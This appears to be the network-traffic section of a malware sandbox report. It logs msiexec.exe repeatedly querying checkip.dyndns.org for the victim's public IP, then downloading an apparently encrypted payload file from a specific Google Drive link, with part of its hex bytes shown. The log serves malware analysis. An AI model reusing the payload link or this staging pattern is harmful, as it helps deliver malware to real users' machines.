Oct 24, 2024 03:40:53.295629978 CEST	275	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 01:40:53 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49945	132.226.8.169	80	8056	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 03:40:54.069977045 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 24, 2024 03:40:55.424243927 CEST	275	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 01:40:55 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49961	132.226.8.169	80	8056	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 03:40:56.198883057 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 24, 2024 03:40:57.110791922 CEST	275	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 01:40:56 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49971	132.226.8.169	80	8056	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 03:40:57.891488075 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 24, 2024 03:40:59.550894022 CEST	275	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 01:40:59 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49987	132.226.8.169	80	8056	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 03:41:00.325725079 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 24, 2024 03:41:02.347038984 CEST	275	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 01:41:02 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	50006	132.226.8.169	80	8056	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 03:41:03.191895008 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 24, 2024 03:41:04.085059881 CEST	275	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 01:41:03 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	50016	132.226.8.169	80	8056	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 03:41:04.870170116 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 24, 2024 03:41:06.307337046 CEST	275	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 01:41:06 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	50019	132.226.8.169	80	8056	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 03:41:07.078478098 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 24, 2024 03:41:07.974011898 CEST	275	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 01:41:07 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49877	142.250.185.78	443	8056	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 01:40:42 UTC	216	OUT	GET /uc?export=download&id=1NwghFuMFKPnna0mjumtI_9wAG96KxTh1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache
2024-10-24 01:40:43 UTC	1610	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 24 Oct 2024 01:40:43 GMT Location: https://drive.usercontent.google.com/download?id=1NwghFuMFKPnna0mjumtI_9wAG96KxTh1&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'nonce-bPVG9eok-VqxNhqqlij_xA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49882	142.250.186.161	443	8056	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 01:40:44 UTC	258	OUT	GET /download?id=1NwghFuMFKPnna0mjumtI_9wAG96KxTh1&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-10-24 01:40:47 UTC	4923	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="JCwlJlAPKkIrvqY54.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 279616 Last-Modified: Tue, 22 Oct 2024 12:23:58 GMT X-GUploader-UploadID: AHmUCY1fWCuwk8G2HA79jIwG38cOX9qve_UFiHxIqjkpGJ6clp4IfdEX_MubEuoHEniiBEeuglAZR8jUaw Date: Thu, 24 Oct 2024 01:40:47 GMT Expires: Thu, 24 Oct 2024 01:40:47 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=MAlX1g== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-10-24 01:40:47 UTC	4923	IN	Data Raw: e0 d3 dc 8e 27 14 88 ba a4 63 ce 47 4b 10 1a b1 67 d5 15 3b df 13 de 36 cb 1a b7 3c e6 39 c2 1c 7a 4c ba 19 db 6c 7f 61 55 32 f6 bd 8a e9 9b ee 2d 5b 9b 9a 37 8f 7e c2 24 60 ae 2b 5d 2c a3 c0 7d 71 f9 fc 1d 9a a5 98 a5 66 f0 6d 5f 1f d3 99 49 86 37 a1 59 4c 8e 5b 48 bb 3f 7c a4 26 fe ce 91 3f af 41 be a1 77 bf 3c f1 a6 cf 95 d1 d3 a0 e4 07 40 ef 91 8e 66 e8 98 5e 80 ec 10 ba 4d a2 0d 74 25 10 30 6f 15 96 75 96 ff 35 79 1e 6c a9 c5 e0 c4 b6 e2 01 25 03 bf bb ed 12 bb 6f 57 14 c2 7a 07 45 a6 6b ec d8 a6 58 3c 0c 80 8a df 7a c8 52 c3 d3 0f ed 4b 98 38 7e 02 21 83 06 52 a1 5d 54 4f 7e 01 59 49 4b f6 a5 3e 5a 2e e2 5b 93 59 ae 43 81 8b f5 c2 e5 62 7f 89 7e f6 77 77 0c f1 1e 84 57 70 70 90 a3 f2 fd 85 e4 fe 5b 5a 74 17 e7 58 94 db a3 59 31 90 c3 a3 81 7f 38 a4 Data Ascii: 'cGKg;6<9zLlaU2-[7~$`+],}qfm_I7YL[H?\|&?Aw<@f^Mt%0ou5yl%oWzEkX<zRK8~!R]TO~YIK>Z.[YCb~wwWpp[ZtXY18
2024-10-24 01:40:47 UTC	4851	IN	Data Raw: c2 e5 2e 1c 29 38 23 e2 86 92 f9 52 e3 3c 59 16 6c e7 bc 3e 25 39 9b e9 84 92 4c ee f4 2d 08 80 ed e3 16 ff 41 db ef 29 b9 7f 7c 29 d4 9f 1c 31 d0 43 d1 ce 3c 5b 77 3f 53 1f 4f f9 55 94 b7 e2 e5 66 51 76 96 37 5f 9a b4 77 6b cb 37 b9 a8 71 49 f1 38 2d fc 41 14 6a 29 5a a7 2a 18 2e ae cb aa 09 f3 2c 1a 0c 5c c3 54 c4 33 61 f2 02 87 d6 38 37 df c1 95 78 f4 ce a6 91 62 f4 af 26 6a 42 3e 9f e6 f3 f8 5f 9a 3c c1 b3 a9 8a 62 31 c1 e2 72 a6 57 fd b8 02 9d 9c 03 8a 5d ec 50 c9 eb b0 de 96 77 51 cd 3c a8 e3 bb eb 11 93 8e 54 05 55 11 33 25 c8 47 94 ab aa e8 99 f7 f4 1f 40 6b 11 6b f9 0f a5 4d 95 d6 69 3b 6b 82 1c 9d 06 59 b2 18 0f 89 e9 f4 86 62 95 c2 ca b3 5d 0f 8e a1 8d b9 33 ef e9 48 db 05 99 9f 9f cc 2f 0c ff 60 a4 dd 6c a8 c9 55 e4 28 4d 95 25 5b d5 e8 3e 06 Data Ascii: .)8#R<Yl>%9L-A)\|)1C<[w?SOUfQv7_wk7qI8-Aj)Z*.,\T3a87xb&jB>_<b1rW]PwQ<TU3%G@kkMi;kYb]3H/`lU(M%[>
2024-10-24 01:40:47 UTC	1324	IN	Data Raw: 5e f1 c9 5e 2e 39 0d 06 f4 69 13 3e c3 19 70 2a 30 6b f2 92 ff c0 98 42 1f e7 c4 e7 74 38 46 10 6a 03 d2 b0 25 3d 72 fb f0 d5 9b d3 3f 9b 90 28 84 7c 8c 1f 36 f6 fe 87 e1 26 52 5a 77 60 ed 82 0f 7b 66 7a b9 a8 0f 4b 64 9b fb 07 97 9e 42 e2 6c 62 01 8f d8 36 9f 37 92 55 a8 7a 5c e6 3a de ed d1 4c ef eb 1e 8b 3f 63 8d 0a bd 01 2c 83 a9 b3 04 6b 20 3a 0e 9f 05 30 b4 65 5f f1 6c c7 87 34 89 46 ad 56 f0 30 da 10 ec 29 8c f9 5d 8c 89 f7 81 90 28 25 e9 7f fa 60 8e 2f 81 de f8 c6 de 23 6b 26 44 db 2b 4b 83 1a f0 75 ba 96 cb 98 fc cb 78 9c 27 e9 49 32 87 8a 66 f2 27 00 41 9c 3a 00 d1 5e 6d 6b ff 56 86 88 e2 54 8f 0a c8 15 84 5f fc 30 25 4d c4 ef 8d 18 16 e5 43 7c 2d 32 a2 b1 0d ca 3b 9b 23 f9 74 d3 6c 4a 07 64 fa 3e 78 fb 1c e7 4c 7f 39 55 58 fc 1e 9e d7 cf a3 66 Data Ascii: ^^.9i>p*0kBt8Fj%=r?(\|6&RZw`{fzKdBlb67Uz\:L?c,k :0e_l4FV0)](%`/#k&D+Kux'I2f'A:^mkVT_0%MC\|-2;#tlJd>xL9UXf
2024-10-24 01:40:47 UTC	1378	IN	Data Raw: cb 0a ef 68 56 6c 66 ad bd f8 f0 3a 73 93 a7 69 96 45 77 f0 72 9c cd fe a7 f0 36 e9 08 47 95 3d f8 30 52 55 7e a1 c2 cf 8d d2 21 ce f4 93 9f 87 6f cd b6 86 18 e2 08 8a 90 25 0e fa ee 41 8d d0 04 13 c6 e5 8a 76 65 22 21 75 f1 3b 10 a2 5f d4 ae 8d 2a 4f 1d 89 5f 4d 8b 01 e1 4d 09 31 2e 25 5f 66 16 07 9d ed 06 5d 87 a6 2b 6d 38 f9 84 c9 87 ec 42 77 65 b5 a8 16 56 14 ec 99 4e c7 21 91 b1 31 4f 4a 5a 7a cc 84 bd 43 29 62 94 c2 12 df 51 cb 57 5e 84 6b 66 e7 ad c5 11 8c c2 d3 99 fd 5b 4b 67 45 93 e2 ac c2 d5 1e e0 46 23 52 97 bb 5d 19 60 fc d8 3a e2 99 bb 74 18 c1 8b 86 7d e7 bd b8 3e 46 9a b7 c8 eb 41 73 2f 67 6b e1 dc 9b cb cb e1 55 fa 7b b4 ee 8a bd fe a6 ad 45 88 9d cb ba c6 1f 9a 82 5b 23 02 cb 3b 34 92 23 d0 1c 1c 96 f4 55 88 32 e4 28 9e e0 b8 98 62 0e 6a Data Ascii: hVlf:siEwr6G=0RU~!o%Ave"!u;_*O_MM1.%_f]+m8BweVN!1OJZzC)bQW^kf[KgEF#R]`:t}>FAs/gkU{E[#;4#U2(bj
2024-10-24 01:40:47 UTC	1378	IN	Data Raw: 58 14 ad dd ae 4a 91 70 04 8b 29 de 87 aa 16 91 46 0a 27 5e d4 66 d9 98 02 b2 bf 65 ea 7c 6f 1c 6c 9c fd 0d f2 d7 e1 69 b9 e7 3c e6 6f 66 21 63 68 72 06 c0 a7 c2 e6 27 9e c0 f2 f0 e2 07 e5 26 c3 76 c8 db 20 81 fc bc a3 2c 7f 43 e9 fa 08 25 cd ec b9 03 b9 d7 dc 44 ba c2 a8 b2 c9 18 34 cc 3c 34 f3 11 bd 8c 80 9b 5a 43 43 49 68 6e 74 a6 5f 7d fd 14 cc b6 bb 41 cc 46 59 9a 09 93 40 9f b8 5b 6a 34 d4 01 0d 78 82 69 7f 5a 9a cf 6b 0f 3a b9 52 37 84 92 34 4a 9b fa 94 39 c5 ba 7e 45 6b cc c4 db 16 15 b7 f8 aa b2 e1 d7 45 cd e1 4c d5 00 2d b8 c4 d1 8e 50 97 cf d3 b3 23 75 0a e2 fb 2d 27 e1 0e 77 30 62 b9 13 18 5a 82 cf 42 1c 88 f1 4c 48 d5 33 8e df 68 74 b6 15 d6 24 bb a0 7e e2 ef fa 1b 6c 0f cc 0a e6 93 b6 b7 40 c9 e6 ef 39 f6 3f cf 80 83 6c 30 df 1e 0d 8d 5e a6 Data Ascii: XJp)F'^fe\|oli<of!chr'&v ,C%D4<4ZCCIhnt_}AFY@[j4xiZk:R74J9~EkEL-P#u-'w0bZBLH3ht$~l@9?l0^
2024-10-24 01:40:47 UTC	1378	IN	Data Raw: 7e e5 c0 1a fe d6 78 bd 09 d2 01 2b 83 a3 93 15 63 5e ff 70 83 0f 4e 8d 0a b1 f5 03 0b f5 6e 82 46 cc 48 aa 3b ca 10 96 17 c6 fa 57 80 c2 f5 96 90 58 73 81 7f fa 6e 93 bf 83 de 82 d0 e7 aa 76 ab 0e cd d5 4b ad 0b bb 35 b4 96 bb 2e 09 89 50 28 26 c1 6e 90 a2 98 66 ce 38 00 41 29 92 1a af 66 6c 4e ed 8a e7 92 90 f2 a8 0e b8 b7 a7 2b 3b 1a 25 47 b2 55 bd 04 14 7d 17 7c 5d 9a f4 8f 0d ca 35 dc a1 f9 74 d3 12 2b 3b 64 fe 12 41 32 1c ed e4 78 24 3f 41 46 1e 9a af ec 22 66 f0 6c ac e0 db eb 71 96 37 d1 36 f7 8e 5b 02 bb 37 02 e6 26 fe ca ef 7c af 41 ba d2 cb bf 3c fb c9 72 95 d1 d9 a0 cc 5d 40 ef 9b 93 eb a8 98 5e 81 c9 86 c8 41 b7 03 1b 3d 3b 27 f3 a8 5b 54 24 5c 5c ac 4d 46 ce ac e3 46 e3 89 10 7a 71 de d2 6f 54 c0 73 9b 74 b6 2a c7 05 9d 67 85 b6 86 35 3d c2 Data Ascii: ~x+c^pNnFH;WXsnvK5.P(&nf8A)flN+;%GU}\|]5t+;dA2x$?AF"flq76[7&\|A<r]@^A=;'[T$\\MFFzqoTst*g5=
2024-10-24 01:40:47 UTC	1378	IN	Data Raw: cb b5 cb 8c c6 f1 c3 e6 4a 5a 19 1e ed a2 a6 d1 cb 27 c4 35 8a 54 97 6f 5e 20 59 d4 b7 41 e8 8a 92 67 2d b2 97 e9 dc 39 bd b2 3e 57 fe ef 62 eb 45 0b 78 74 70 fe 11 b3 4a c1 e1 5f d4 46 b5 fd ae ac da 9c d9 2e 05 dd c1 ba e7 3a 80 f0 3f 04 75 bb 99 1b 85 17 e9 5c 1c 9c 57 55 86 32 27 2c 9e e0 32 fc 7b 70 54 99 c0 6d 55 9e c4 37 b0 30 5c ad 32 34 79 e1 3c 17 48 c2 d7 43 fd 37 4b a6 ef f8 71 81 7d 50 57 e4 68 5a ff 0a e3 c7 36 e0 e4 da 3a 5f 49 82 88 8f 9f 45 bb 4c aa dc 6d 32 60 cf f9 f8 a9 59 d5 bd 2e 99 af 10 37 e1 e9 a1 ac 95 5e ee d8 9e 89 dd 50 3a 8d 57 10 ca 35 ff 37 8d c8 05 40 4b 7a a4 75 53 d0 3e 7d ba 19 e5 cd 2d e2 98 3a dd 4b 81 7f a4 cc 29 e2 06 02 d4 5c 85 4d 85 25 75 72 fa 41 21 e6 c1 f5 e0 e2 84 17 63 05 b4 47 4a b6 95 7c e9 d9 42 e7 c0 c7 Data Ascii: JZ'5To^ YAg-9>WbExtpJ_F.:?u\WU2',2{pTmU70\24y<HC7Kq}PWhZ6:_IELm2`Y.7^P:W57@KzuS>}-:K)\M%urA!cGJ\|B
2024-10-24 01:40:47 UTC	1378	IN	Data Raw: 39 a6 94 33 cf a7 71 5c e3 ca 60 b4 a8 1f b7 e3 ac dd 29 b8 fa c7 e1 6e bc 09 25 a8 cc 81 f7 1a e1 fb d3 b9 29 6f 6f 48 d3 4f 2d e1 da a5 30 6b 95 14 6f 00 83 cf 46 64 df 2f 92 2b e6 33 3b df 68 74 b3 ef d7 1f d2 b1 75 d1 f9 98 1d 6c 71 e7 0a e6 e9 ac 5c 40 cd 9e ab 37 88 79 d9 a8 06 1e 12 c4 08 83 9a 65 22 c6 f1 e0 b4 05 10 80 48 ce ca 54 56 03 65 18 d2 56 79 0b 11 e2 27 09 02 16 23 68 0b e1 e0 47 08 21 50 66 a6 af 25 73 aa 54 06 2c 54 bb ec a9 ce 66 f3 7b 8a d4 4c a4 49 53 d9 dc 51 0e 51 14 92 69 1f ad 79 0e 49 55 dc b7 64 6d f7 a2 ae 3b f3 9a b8 c5 06 7a 2b 9d b5 c8 4b 8a 75 2a ec c3 35 ed ec 11 c6 29 48 39 c0 72 b5 8c 7f ec cb 09 7a b8 bd 24 3c 85 0a 8d 3f e5 95 25 9c 07 36 56 f7 87 77 84 c4 a4 c9 de 9b a6 15 11 b2 a1 4f 1a c0 57 71 06 39 b8 05 60 4b Data Ascii: 93q\`)n%)ooHO-0koFd/+3;htulq\@7ye"HTVeVy'#hG!Pf%sT,Tf{LISQQiyIUdm;z+Ku*5)H9rz$<?%6VwOWq9`K
2024-10-24 01:40:47 UTC	1378	IN	Data Raw: 64 a4 8b 80 77 d1 54 6e e0 d3 99 d9 dc 37 a1 53 51 03 1b 08 bb 3e 59 b2 54 d2 d8 91 4f 0d 64 a9 89 c3 bf 3c fb 04 ea 8d a3 ad af e4 77 e2 ca 88 f0 5e e8 98 5a 22 c9 8a c8 76 a1 03 1b 3d 3b 2b a5 3c 5b 54 2a 5c 5c a8 4d 00 d7 ac e3 46 ee e5 6e 42 7b b1 8a cd 71 d0 12 1b 60 3b 1a 65 20 87 3c 8f c4 cc 26 52 5c 66 e0 9b 72 11 3d a7 bc 83 c5 5e e0 62 71 02 51 21 23 4b df 35 11 4f 7a ef 7d 50 39 14 23 ae 4c 8c ca 2e 93 59 a4 50 a2 7d dd b6 e4 69 74 d9 5e f6 55 73 0c d9 7d 84 57 7a 70 90 dd 43 b1 81 e0 ef 59 28 1e 00 87 2c ea c4 a3 19 35 b8 aa a3 81 75 2b 87 34 33 92 d6 67 b4 cd 10 b7 8f 87 a2 8e ea ff 2f 4f c7 bc 50 05 ea 3c d8 22 3f 3b f1 52 0a 80 67 06 d3 14 1a e6 46 a8 de ce 14 13 a8 c7 cb 07 e0 9d f9 c1 ce 49 0b b6 b3 2d 97 74 09 04 63 b1 3c 81 63 6f 9e 93 Data Ascii: dwTn7SQ>YTOd<w^Z"v=;+<[T*\\MFnB{q`;e <&R\fr=^bqQ!#K5Oz}P9#L.YP}it^Us}WzpCY(,5u+43g/OP<"?;RgFI-tc<co
2024-10-24 01:40:47 UTC	1378	IN	Data Raw: 15 44 b7 53 d9 f9 7a 10 c5 df 8b 1e 1d 7c bd b1 b3 8c af 64 bd 8d f0 89 12 e7 52 f5 7a cb e0 7d 34 28 87 48 61 e2 40 f5 37 f9 56 2d 35 4f 09 67 66 4d a8 e7 79 c4 58 9b d2 29 90 cb 10 94 3b 97 5d 57 74 3b e8 60 d4 97 4f 97 5a 86 17 68 77 c3 12 4e 2c c7 f5 37 63 85 3c 68 20 8d 62 5c d9 55 6f f6 d3 6a 85 d1 d6 c0 8f 6b 42 4b c6 bd 12 2d 50 f4 dd f0 92 20 dd 9b 40 0e 58 06 b8 1b 0a 93 c1 ee d2 ef 42 c7 8a 84 be 92 28 f3 cf b7 13 e2 e3 34 57 84 6b d7 e1 c7 cf 38 be f5 34 ab 49 02 fa 14 24 5a 19 ac 04 ff 1d ca 11 2b df 42 2d ff e0 43 b2 ef ce f0 9c 1a 85 74 1d f7 82 90 bf 62 b3 24 fb 08 31 cb 56 9a 9b cc 58 b4 91 48 23 de 6f 07 12 72 fa ad ba d5 77 8b 74 f1 f7 47 f8 9f 70 42 f0 73 47 73 af ed 92 a9 7f be d4 39 b6 bf ac 51 40 6b 06 dd a8 bc a2 59 d8 b3 a3 26 60 Data Ascii: DSz\|dRz}4(Ha@7V-5OgfMyX);]Wt;`OZhwN,7c<h b\UojkBK-P @XB(4Wk84I$Z+B-Ctb$1VXH#orwtGpBsGs9Q@kY&`

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
